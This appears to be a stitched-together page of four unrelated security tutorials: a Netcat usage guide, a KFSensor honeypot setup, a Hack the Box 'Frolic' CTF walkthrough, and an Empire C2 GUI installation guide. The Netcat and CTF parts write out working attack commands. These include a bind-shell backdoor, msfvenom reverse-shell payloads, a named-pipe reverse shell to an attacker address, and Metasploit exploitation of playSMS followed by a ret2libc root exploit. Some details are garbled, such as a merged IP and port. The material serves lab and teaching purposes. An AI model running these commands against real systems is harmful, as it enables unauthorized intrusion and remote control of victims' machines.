This article will provide you with the basic guide of Netcat and how to get a session from it using different methods.

Table of Contents:

• Introduction
  
• Features
  
• Getting start with NC
  
• Connecting to a Server
  
• Fetching HTTP header
  
• Chatting
  
• Creating a Backdoor
  
• Verbose Mode
  
• Save Output to Disk
  
• Port Scanning
  
• TCP Delay Scan
  
• UDP Scan
  
• Reverse TCP Shell Exploitation
  
• Randomize Port
  
• File Transfer
  
• Reverse Netcat Shell Exploitation
  
• Banner grabbing
  

Introduction to Netcat

Netcat or nc is a utility tool that uses TCP and UDP connections to read and write in a network. It can be used for both attacking and security. In the case of attacking, it can be driven by scripts which makes it quite dependable back-end. and if we talk about security, it helps us to debug the network along with investing it.

Features

• Act as a simple TCP/UDP/SCTP/SSL client for interacting with web servers, telnet servers, mail servers, and other TCP/IP network services. Often the best way to understand a service (for fixing problems, finding security flaws, or testing custom commands) is to interact with it using Netcat. This lets you control every character sent and view the raw, unfiltered responses.
  
• Redirect or proxy TCP/UDP/SCTP traffic to other ports or hosts. This can be done using simple redirection (everything sent to a port is automatically relayed somewhere else you specify in advance) or by acting as a SOCKS or HTTP proxy so clients specify their own destinations. In client mode, Netcat can connect to destinations through a chain of anonymous or authenticated proxies.
  
• Run on all major operating systems. We distribute Linux, Windows, and Mac OS X binaries, and Netcat compiles on most other systems. A trusted tool must be available whenever you need it, no matter what computer you’re using.
  
• Encrypt communication with SSL, and transport it over IPv4 or IPv6.
  
• Act as a network gateway for execution of system commands, with I/O redirected to the network. It was designed to work like the Unix utility cat, but for the network.
  
• Act as a connection broker, allowing two (or far more) clients to connect to each other through a third (brokering) server. This enables multiple machines hidden behind NAT gateways to communicate with each other, and also enables the simple Netcat chat mode.
  

Getting start with NC

To start NC, the most basic option we can use the help command. This will show us all the options that we can use with Netcat. The help command is the following one :
nc -h
1
nc -h

Connecting to a Server
Here, we have connected FTP Server with the IP Address 192.168.1.6. To connect to the server at a specific port where a particular service running. In our case, the port is 21 i.e. FTP.
Syntax: nc [Target IP Address] [Target Port]
nc 192.168.1.6 21
1
nc 192.168.1.6 21
As we can see in the given image, we have vsFTPd installed on the server, and after giving the Login credentials we have successfully logged in the FTP Server.

Fetching HTTP header
We can use netcat to fetch information about any webserver. Let’s get back to the server we connected to earlier. It also has HTTP service running on port 80. So, we connected to HTTP service using netcat as we did earlier. Now after connecting to the server, we use the option that will give us the header along with the source code of the HTTP service running on the remote server.
nc 192.168.1.6 80
HEAD/HTTP/1.0
1
2
nc 192.168.1.6 80
HEAD/HTTP/1.0
As we can see in the given image that the header and source code is displayed through the netcat connection.

Chatting

Netcat can also be used to chat between two users. We need to establish a connection before chatting. To do this we are going to need two devices. One will play the role of initiator and one will be a listener to start the conversation and so once the connection is established, communication can be done from both ends. Here we are going to create a scenario of chatting between two users with the different operating system.
User 1
OS: Windows 10
IP Address: 192.168.1.4
Role: Listener
User 2
OS: Kali Linux
IP Address: 192.168.1.35
Role: Initiator
Now in each and every scenario, regarding netcat. This step is prominent. First, we will have to create a listener. We will use the following command to create a listener:
nc -lvvp 4444
1
nc -lvvp 4444
where,
[-l]: Listen Mode
[vv]: Verbose Mode {It can be used once, but we use twice to be more verbose}
[p]: Local Port

Now, it’s time to create an initiator, for this we will just provide the IP Address of the System where we started the Listener followed by the port number.
NOTE: Use the same port to create an initiator which was used in creating listener
nc 192.168.1.4 4444
1
nc 192.168.1.4 4444

Creating a Backdoor

We can also create a backdoor using NC. To create a backdoor on the target system that we can come back to at any time. Command for attacking a Linux System.
nc -l -p 2222 -e /bin/bash
1
nc -l -p 2222 -e /bin/bash

This will open a listener on the system that will pipe the command shell or the Linux bash shell to the connecting system.
nc 192.168.1.35 2222
1
nc 192.168.1.35 2222

Verbose Mode
In netcat, Verbose is a mode which can be initiated using [-v] parameter. Now verbose mode generates extended information. Basically, we will connect to a server using netcat two times to see the difference between normal and verbose mode. In the image given below, we can see that when we add [-v] to the netcat command it displays the information about the process that its performance while connecting to the server.
nc 192.168.1.6 21 -v
1
nc 192.168.1.6 21 -v

Save Output to Disk

For the purpose of the record maintenance, better readability and future references, we will save the output of the Netcat. To do this we will use the parameter -o of the Netcat to save the output in the text file.
nc 192.168.1.6 21 -v -o /root/output.txt
1
nc 192.168.1.6 21 -v -o /root/output.txt
Now that we have successfully executed the command, now let’s traverse to the location to ensure whether the output has been saved on the file or not. In this case, our location for output is /root /output.txt.

Port Scanning

Netcat can be used as a port scanner although it was not designed to function as one. To work as a port scanner, we use the [-z] parameter. It tells netcat to scan listing daemon without sending any data. This makes it possible for netcat to understand the type of service that is running on that specific port. Netcat can perform TCP and UDP scan.
TCP Scan
nc -v -n -z -w 2 192.168.1.6 21-1100
1
nc -v -n -z -w 2 192.168.1.6 21-1100
Here,

• [-v]: indicates Verbose mode
  
• [-n]: indicates numeric-only IP addresses
  
• [-z]: indicates zero -I/O mode [used for scanning]
  
• [-w]: indicates timeout for connects and final net reads
  

Also, to perform a port scan netcat needs a range of port numbers. We can provide a range of ports to scan.
From the given image we can see that the target machine has lots of ports open with various services running on them.
nc -v -n -z -w 2 192.168.1.6 21-1100
1
nc -v -n -z -w 2 192.168.1.6 21-1100

TCP Delay Scan
In order to not to be noisy in an environment, it is recommended to use a delayed scan. Now to perform a delayed scan, we need to specify the delay. We will use the [-i] parameter to specify the delay in sending the next packet in seconds.
nc -z -v -i 10 192.168.1.6 21-80
1
nc -z -v -i 10 192.168.1.6 21-80

UDP Scan
Netcat can scan the UDP ports in a similar way it scanned the TCP ports. We are going to use [-u] parameter to invoke the UDP mode.
nc -vzu 192.168.1.6 80-90
1
nc -vzu 192.168.1.6 80-90

Reverse TCP Shell Exploitation
We can exploit a system using a combination of msfvenom and netcat. We will use msfvenom to create a payload and netcat to listen for the session. Firstly, we will have to create a payload.
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.35 lport=2124 -f exe > /root/Desktop/1.exe
1
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.35 lport=2124 -f exe > /root/Desktop/1.exe
We are using the shell_reverse_tcp payload to get a session. We have provided with Local IP address and port and then exported the script inside an Executable(exe) file. Now we will create a listener using netcat on the port we provided during the payload creation. We will now have to send the payload file to the target. When the target will run the executable file, we will get a session on our netcat listener.
nc -lvvp 2124
1
nc -lvvp 2124

Randomize Port
If we can’t decide our very own port to start listener or establish our Netcat connection. Well, netcat has a special -r parameter for us which gives us randomize local port.
nc -lv -r
1
nc -lv -r

File Transfer
Netcat can be used to transfer the file across devices. Here we will create a scenario where we will transfer a file from a windows system to Kali Linux system. To send the file from the Windows, we will use the following command.
nc -v -w 30 -p 8888 -l < C:\netcat\output.txt
1
nc -v -w 30 -p 8888 -l < C:\netcat\output.txt

Now we will have to receive the file shared on Kali Linux. Here we will provide netcat with the Windows IP Address and the port which hosts the file. And write the output inside a text file. For doing this we will use the following command:
nc -v -w 2 192.168.1.4 8888 > output.txt
1
nc -v -w 2 192.168.1.4 8888 > output.txt

Reverse Netcat Shell Exploitation
We will use msfvenom to create a payload and netcat to listen for the session. Firstly, we will have to create a payload.
msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.35 lport=6666 R
1
msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.35 lport=6666 R

So, when you execute the above command; you will get another command that has to be run in the target system, as shown in the image below, you will have your session as shown in the image above.

Another way to have a reverse shell is by executing the following command in the target system :
mknod /tmp/backpipe p
1
mknod /tmp/backpipe p

/bin/sh 0</tmp/backpipe | nc 192.168.1.35443 1>/tmp/backpipe
1
/bin/sh 0</tmp/backpipe | nc 192.168.1.35443 1>/tmp/backpipe
And then when you start netcat as shown in the image below, you will have a session.

Banner Grabbing
To grab the target port banner from netcat, use the following command :
nc -v 192.168.1.2 22
1
nc -v 192.168.1.2 22
So, this was a basic guide to netcat. It’s quite an interesting tool to use as well as it is pretty easy.


In this article, however, we will set up a framework to draw in attacker so we can catch or study them. Since almost the majority of the attackers around the globe are focusing on Windows servers for the various of their known defects and vulnerabilities, we will set up a Windows framework to do only that. we will set up a honeypot. In the event that you abandon it ready for action, you can watch other attackers rehearsing their attack and prepare for it.
Table of Content:

• Introduction to Honeypot
  
• Introduction to KFSensor
  
• Working of KFSensor
  

Introduction to Honeypot
Honeypot disguises itself as an actual server to give the false idea to the attackers and divert their attacks. Therefore,a honeypot should be set up just like the real server so that data can appear to be authentic by showing fake files, fake ports, fake directories, etc. As the honeypot creates the illusion of being legitimate; the attacker tends to believe that they have gained accessed of the real deal. One of the main differences is the area of the machine in connection to the genuine servers. The disguised machine is normally set someplace in the DMZ. This guarantees the inner system isn’t presented to the attacker. Honeypots work by checking and\or once in a while controlling the interloper amid their utilization of the Honeypot. This should be possible whether the assault originated all things considered or within the system, contingent upon the area of the distraction framework. Honeypots are commonly intended to review the action of an interloper, spare log documents, and record such occasions as the procedures began, orders, a record includes, erases, changes, and even keystrokes.
Introduction to KFSensor
KFSensor is a honeypot for a windows system. it also acts as an IDS. Its job is to attract and detect all the attackers in the network, hence the name ‘Honeypot’. It does so by imitating a vulnerable environment and disguising itself as a server and it way, it succeeds to not only catch the attacker but also helps to know their motive. It is specifically designed for windows therefore it contains a lot of windows dedicated unique features. It’s quite convenient to use and a user friendly due to its GUI based console, along with its low maintains.
Working of KFSensor
KFSensor’s role is to be a decoy server for the attackers in order to protect the real thing. It does its job perfectly by opening fake ports on the system where it’s installed and gathering the information when a connection is made. It does this in precisely the same way as a routine server program, such as a web server or an SMTP server. By doing this it sets up a target, or a honeypot server, that will record the activities of an attacker.
Working with KFSensor
After downloading and installing KFSensor, when you turn it on, you will see the following window. Here, click on next.

Then it will ask you to select the ports as shown in the image below, after selecting the ports click on next button.

Then it will ask you if you want get email notification of its alerts over the time. So, here, you can add the email from which you want to send and the email where you want to receive the mails.

After these formalities, click on finish button.

Once, you click on the finish button, it will show you the following window.

Now, as the honeypot has been setup, if you scan the victim target (which is installed with honeypot) using nmap, it will show you all the ports open ass a decoy, just like its shown in the image below :

And in KFSensor it will show the details of the scan along with its IP. It will also generate an alarm to alert you.

If the attacker is using any other tool to scan the network, like Nessus, even then the working of KFSensor will be same. For instance, if the attack is through Nessus as shown in the image below :

And when the attack from Nessus is completed, it will show you the faux result as you can see in the image below :

And similarly, the KFSensor will alert you as it is shown in the image below :

This way, KFSenor is the best way to detect and confuse the attacker in order to save yourself and be cautious.

Today we are going to solve another CTF challenge “Frolic”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.
Level: Expert
Task: To find user.txt and root.txt file
Note: Since these labs are online available therefore they have a static IP. The IP of Frolic is 10.10.10.111
Penetrating Methodology

• Network scanning (Nmap)
  
• Surfing HTTPS service port (9999)
  
• Enumerating directory using dirb
  
• Enumerating web application
  
• Finding Playsms management system
  
• Exploiting playsms and getting a reverse shell
  
• Getting user flag
  
• Finding SUID bit files
  
• Finding a vulnerability in the binary
  
• Exploiting binary and getting a root shell
  
• Getting the root flag
  

Walkthrough
Let’s start off with our basic Nmap command to find out the open ports and services.
nmap -sV 10.10.10.111
1
nmap -sV 10.10.10.111

The Nmap scan shows us that there are 4 ports are open: 22(SSH), 139(SMB), 445(SMB), 9999(HTTP)
As port 9999 is running HTTP service, we open the IP address in the web browser.

We don’t find anything on the web page, so we further enumerate the web service using dirb scan.
dirb

[To see content please register here]

1
dirb

[To see content please register here]

Dirb scan gave us a few interesting looking links, we open a link called /admin/ and find a login page.

We take a look at the source code and find a link called “login.js”. 

We open the “login.js” and find username and password hardcoded in the JavaScript.

We use the username and password we found earlier to login. After logging in we find “look” encoded string.

We decode the string and a link inside.

We open the link and find a page with base64 encoded string.

We copy the base64 encoded string and save it in our system and then convert it and save it in a file. We check the file type and find it is a zip file. We try to extract it and find it is password protected. We use fcrackzip to bruteforce the zip file and find the password to be “password”. We extract the files from the zip file and find a file called index.php. We take a look at the content of the file and find hex encoded string.
base64 -d code > encodedfile
file encodedfile
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u encodedfile
unzip encodedfile
1
2
3
4
base64 -d code > encodedfile
file encodedfile
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u encodedfile
unzip encodedfile

We decoded the string using burpsuite and find a base64 encoded string. We decode the base64 encoded string and find a brainfuck encoded string.

We decoded the brainfuck encoded string and find a string called “idkwhatispass”.

We open /playsms directory and find playsms CMS login page.

We try username “admin” and password “idkwhatispass” to login and are successfully able to login. So we use Metasploit to get a reverse shell using these credentials.
msf > use exploit/multi/http/playsms_uploadcsv_exec
msf exploit(multi/http/playsms_uploadcsv_exec) > set rhosts 10.10.10.111
msf exploit(multi/http/playsms_uploadcsv_exec) > set rport 9999
msf exploit(multi/http/playsms_uploadcsv_exec) > set targeturi /playsms
msf exploit(multi/http/playsms_uploadcsv_exec) > set username admin
msf exploit(multi/http/playsms_uploadcsv_exec) > set password idkwhatispass
msf exploit(multi/http/playsms_uploadcsv_exec) > set lhost tun0
msf exploit(multi/http/playsms_uploadcsv_exec) > exploit
1
2
3
4
5
6
7
8
msf > use exploit/multi/http/playsms_uploadcsv_exec
msf exploit(multi/http/playsms_uploadcsv_exec) > set rhosts 10.10.10.111
msf exploit(multi/http/playsms_uploadcsv_exec) > set rport 9999
msf exploit(multi/http/playsms_uploadcsv_exec) > set targeturi /playsms
msf exploit(multi/http/playsms_uploadcsv_exec) > set username admin
msf exploit(multi/http/playsms_uploadcsv_exec) > set password idkwhatispass
msf exploit(multi/http/playsms_uploadcsv_exec) > set lhost tun0
msf exploit(multi/http/playsms_uploadcsv_exec) > exploit
After getting a reverse shell, we spawn a TTY shell and start enumerating the system. Inside /home/aysush directory we find a file called “user.txt”. We open the file and find the first flag. Then we start looking for files with SUID bit set and find a file called “rop” inside “/home/ayush/.binary” directory.

python -c "import pty; pty.spawn('/bin/bash')"
find / -perm -u=s -type f 2>/dev/null
1
2
python -c "import pty; pty.spawn('/bin/bash')"
find / -perm -u=s -type f 2>/dev/null

The target machine doesn’t have “gdb”, so we download the “rop” file in our system and start looking for vulnerabilities. We create a 150 bytes long pattern with pattern_create.rb file in our system and then open the file with “gdb” and supply the pattern as an argument to our file. As soon as we run the application we get a segmentation fault. Now as we can overwrite instruction pointer that means the application is vulnerable to buffer overflow.
gdb -q rop
r <pattern>
1
2
gdb -q rop
r <pattern>

We copy the value of EIP and use “pattern_offset.rb” script to find the EIP offset.
./pattern_offset -q 0x62413762
1
./pattern_offset -q 0x62413762

As it is difficult for us to make a jump to stack because we cannot get the address of the stack we want to jump. So we use ret2libc to exploit the vulnerability and get a shell. Now in our system, we first find the address of “system” function and a return address. Now we find the address of “/bin/sh” to execute using “system” function.
p system
p exit
find 0xf7e0c980, +9999999, "/bin/sh"
1
2
3
p system
p exit
find 0xf7e0c980, +9999999, "/bin/sh"

We write an exploit and check if we can exploit the application to spawn a shell.

We run the exploit in our system and are successfully able to spawn a shell.
r $(python exploit.py)
1
r $(python exploit.py)

Now we cannot directly run this exploit on the target system, as we don’t have the addresses of the libc functions of the target system. We are going to change the addresses of the exploit according to the target machine. First, get the address of libc used by the binary. As we don’t have gdb in the target system, so we use readelf, strings and grep to find “system”, “exit” and “/bin/sh” for our exploit.
ldd /home/ayush/.binary/rop |grep libc
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit
strings -tx /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh"
1
2
3
4
ldd /home/ayush/.binary/rop |grep libc
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit
strings -tx /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh"

We have to add the value of “system”, “exit” and “/bin/sh” to the address of libc to get the address of “system”, “exit” and “/bin/sh”.Now we make the following changes to the exploit. You can download the exploit from here.

We transfer the exploit to the target machine and run the exploit. As soon as we run the exploit we are able to spawn a shell as the root user.
/home/ayush/.binary/rop $(python /tmp/exploit.py)
1
/home/ayush/.binary/rop $(python /tmp/exploit.py)
After getting a reverse shell, we switch to /root directory and get a file called “root.txt”. We take a look at the content of the file and get the final flag.


This is our 8th post in the series of the empire which covers how to use empire as GUI. Empire has a great GUI mechanism, but it’s still developing as it has been released just a while back. For empire GUI to work, we need to download all of its dependencies and this is where it gets a bit complicated. So, first of all, we will download the beta 3.0 version of empire as it’s the only version compatible with the GUI. Using the following commands:
git init
git remote add -t "3.0-beta" -f origin "//github.com/EmpireProject/Empire"
1
2
git init
git remote add -t "3.0-beta" -f origin "//github.com/EmpireProject/Empire"

Now run the following command as instructed on the GitHub page :
git checkout 3.0-Beta
1
git checkout 3.0-Beta

Now to install the beta version, type the following command :
./setup/install.sh
1
./setup/install.sh

Now to run empire use the following as it will link the command line to GUI version :
./empire –server –shared_password 12345 –port 1337
1
./empire –server –shared_password 12345 –port 1337

And as shown in the image below, the Empire will start.

Now, download the GUI of empire from GitHub using the following command :
git clone //github.com/EmpireProject/EmpireGUI.git
1
git clone //github.com/EmpireProject/EmpireGUI.git

Now that GUI of empire and the beta version of empire has been downloaded, we need to install its dependencies for it to work successfully. And for that, we will have to download nodejs first and to download it, type :
apt install nodejs
1
apt install nodejs
And in time, it will be installed as shown in the image below :

After nodejs, we have to download npm and for that type :
apt install npm
1
apt install npm

As its download, like in the image above, now run the following command in order to install it :
npm install
1
npm install

And then start the npm service, as shown in the image below, with the following command :
npm start
1
npm start

After all this, the GUI of empire will start as shown in the image below :

Moving further once the GUI of empire is up and running, create a stager and get an agent from the beta version of empire, while getting a session, remember to use port 1337 as that is the port the GUI works on.

Now, on the GUI, log in using your IP and port and other details as shown in the image below :

And as you will login, it will show you all the sessions you have, just like in the image below :
Here, all the shell commands will work as shown in the image above. As the GUI is still developing, we can’t use it for post exploitations. But it, it comes pretty handy in order to manage multiple sessions and it helps you understand it’s working better.